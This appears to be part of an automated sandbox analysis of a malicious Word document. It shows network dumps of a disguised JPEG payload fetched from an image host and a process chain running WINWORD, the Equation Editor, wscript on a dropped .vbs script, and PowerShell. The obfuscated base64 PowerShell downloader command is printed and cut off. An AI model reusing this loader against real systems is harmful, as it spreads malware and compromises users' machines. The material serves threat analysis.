                                                      2024-05-01 12:55:28 UTC1369INData Raw: 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3
                                                      Data Ascii: r:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
                                                      2024-05-01 12:55:28 UTC1369INData Raw: dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae
                                                      Data Ascii: Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
                                                      2024-05-01 12:55:28 UTC1369INData Raw: 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce
                                                      Data Ascii: lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@
                                                      2024-05-01 12:55:28 UTC1369INData Raw: f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8
                                                      Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.2249168172.67.215.454433544C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-05-01 12:55:30 UTC100OUTGET /images/004/773/797/original/new_image.jpg?1713882029 HTTP/1.1
                                                      Host: uploaddeimagens.com.br
                                                      2024-05-01 12:55:30 UTC690INHTTP/1.1 200 OK
                                                      Date: Wed, 01 May 2024 12:55:30 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 4198361
                                                      Connection: close
                                                      Last-Modified: Tue, 23 Apr 2024 14:20:29 GMT
                                                      ETag: "6627c3ad-400fd9"
                                                      Cache-Control: max-age=2678400
                                                      CF-Cache-Status: REVALIDATED
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oBtBdjKTd2YhNIvqiC85vOWKHIrZmeOYq859RcT7Aj8NM78JRWr6nTeKMPQVKSoLIr%2FHNCwHJ5uyESdtxJU51X6RGCt48oYfEp35VLk5Pkzi%2BWI0rwqKUvYcLezCA7ZZ5CrKDiXmkAFH"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 87cfed1dfee43b18-IAD
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-05-01 12:55:30 UTC679INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                      Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                      2024-05-01 12:55:30 UTC1369INData Raw: 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e
                                                      Data Ascii: ccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4ApC.J
                                                      2024-05-01 12:55:30 UTC1369INData Raw: ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31 53 47
                                                      Data Ascii: y2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1SG
                                                      2024-05-01 12:55:30 UTC1369INData Raw: 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5
                                                      Data Ascii: r7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(hd
                                                      2024-05-01 12:55:30 UTC1369INData Raw: 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e
                                                      Data Ascii: Pscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E.
                                                      2024-05-01 12:55:30 UTC1369INData Raw: 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64 0a 35
                                                      Data Ascii: vOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd5
                                                      2024-05-01 12:55:30 UTC1369INData Raw: 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1 0d 56
                                                      Data Ascii: {b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},zV
                                                      2024-05-01 12:55:30 UTC1369INData Raw: 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05 05 e6
                                                      Data Ascii: #MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
                                                      2024-05-01 12:55:30 UTC1369INData Raw: d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43
                                                      Data Ascii: nq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@BH5`C
                                                      2024-05-01 12:55:30 UTC1369INData Raw: 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd 7c 6b
                                                      Data Ascii: 2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v|k


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:0
                                                      Start time:14:54:58
                                                      Start date:01/05/2024
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                      Imagebase:0x13fab0000
                                                      File size:1'423'704 bytes
                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:2
                                                      Start time:14:54:59
                                                      Start date:01/05/2024
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543'304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:5
                                                      Start time:14:55:03
                                                      Start date:01/05/2024
                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs"
                                                      Imagebase:0xb10000
                                                      File size:141'824 bytes
                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:7
                                                      Start time:14:55:24
                                                      Start date:01/05/2024
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543'304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      General

                                                      Target ID:8
                                                      Start time:14:55:24
                                                      Start date:01/05/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTred